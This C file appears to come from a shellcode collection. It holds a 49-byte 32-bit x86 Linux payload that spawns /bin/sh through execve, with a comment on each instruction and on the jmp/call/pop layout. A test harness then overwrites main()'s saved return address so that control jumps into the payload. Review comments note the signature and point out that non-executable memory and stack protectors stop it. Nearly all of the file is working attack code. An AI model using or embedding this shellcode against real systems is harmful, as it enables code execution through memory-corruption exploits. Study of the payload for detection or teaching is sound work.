/*
 * execve /bin/sh linux shellcode by BreeZe <breeze@binbash.org>
 */

#define info    "execve /bin/sh"

#include <stdio.h>
#include <string.h>

/*
 * 32-bit x86 Linux payload stored as a C string: 49 bytes, none of them
 * zero, so strlen(shellcode) reports the full length.
 *
 * Layout (offsets from the start of the array):
 *   0x00        jmp to the call at 0x1c
 *   0x02-0x1b   code that builds the execve arguments and issues int $0x80
 *   0x1c        call back to 0x02; the pushed return address is 0x21,
 *               i.e. the address of the data that follows
 *   0x21-0x27   the bytes "/bin/sh" (data, not instructions)
 *   0x28-0x30   nine filler bytes the code overwrites at run time
 *
 * Review notes:
 *  - Everything after the call is data. A linear disassembler prints it as
 *    das/bound/jae/push/..., which is meaningless; the comments below give
 *    the ASCII values instead.
 *  - The code writes into its own trailing bytes (0x7, 0x8 and 0xc past
 *    %esi), so it needs memory that is writable and executable at once.
 *    An ordinary data array under a W^X policy does not satisfy that.
 *  - The jmp / call / pop sequence followed by "mov $0xb,%al; int $0x80"
 *    is the recognisable shape of this payload family.
 */
char shellcode[] =    

/* jump to G2C (offset 0x1c) so the call there can push the data address */
"\xeb\x1a"			// jmp    804809c <G2C>

/* start <shellcode> */

/* execve /bin/sh */
"\x5e"				// pop    %esi            ; %esi = address of "/bin/sh"
"\x31\xc0"			// xor    %eax,%eax       ; zero without a NUL byte
"\x88\x46\x07"			// mov    %al,0x7(%esi)   ; NUL-terminate the path
"\x8d\x1e"			// lea    (%esi),%ebx     ; %ebx = path
"\x89\x5e\x08"			// mov    %ebx,0x8(%esi)  ; argv[0] = path
"\x89\x46\x0c"			// mov    %eax,0xc(%esi)  ; argv[1] = NULL
"\xb0\x0b"			// mov    $0xb,%al        ; syscall 11 (execve on i386)
"\x89\xf3"			// mov    %esi,%ebx       ; redundant: %ebx already holds path
"\x8d\x4e\x08"			// lea    0x8(%esi),%ecx  ; %ecx = argv
"\x8d\x56\x0c"			// lea    0xc(%esi),%edx  ; %edx = address of the NULL word
"\xcd\x80"			// int    $0x80

/* G2C: call back to offset 0x02; what follows the call is data */
"\xe8\xe1\xff\xff\xff"		// call   8048082 <shellcode>
"\x2f"				// data: '/'
"\x62\x69\x6e"			// data: "bin"
"\x2f"				// data: '/'
"\x73\x68"			// data: "sh"
"\x54"				// filler 'T' at 0x7(%esi): overwritten with NUL
"\x52"				// filler 'R' \
"\x4f"				// filler 'O'  | 0x8(%esi): overwritten with
"\x45"				// filler 'E'  | the argv[0] pointer
"\x50"				// filler 'P' /
"\x4a"				// filler 'J' \
"\x55"				// filler 'U'  | 0xc(%esi): overwritten with
"\x48"				// filler 'H'  | the NULL word
"\x53"				// filler 'S' /
;

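/*
 * Test harness: prints the payload label and its length, then stores the
 * address of shellcode[] through a pointer computed from the address of a
 * local variable.
 *
 * NOTE(review): the store is intended to land on main()'s saved return
 * address, so control would move to the array when main() returns. This is
 * undefined behaviour in C and depends entirely on the compiler's frame
 * layout. Non-executable data pages, a stack protector, or 64-bit pointers
 * (the (int) cast below truncates them) each stop the transfer.
 */
int
main()
{
	int *ret;

	/* Two ints above the local; assumed to be the return-address slot. */
	ret = (int *)&ret + 2;
	printf("Shellcode info = %s\n",info);
	/* strlen() returns size_t, so print it with %zu rather than %d. */
	printf("Shellcode length = %zu\n",strlen(shellcode));
	(*ret) = (int)shellcode;
}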
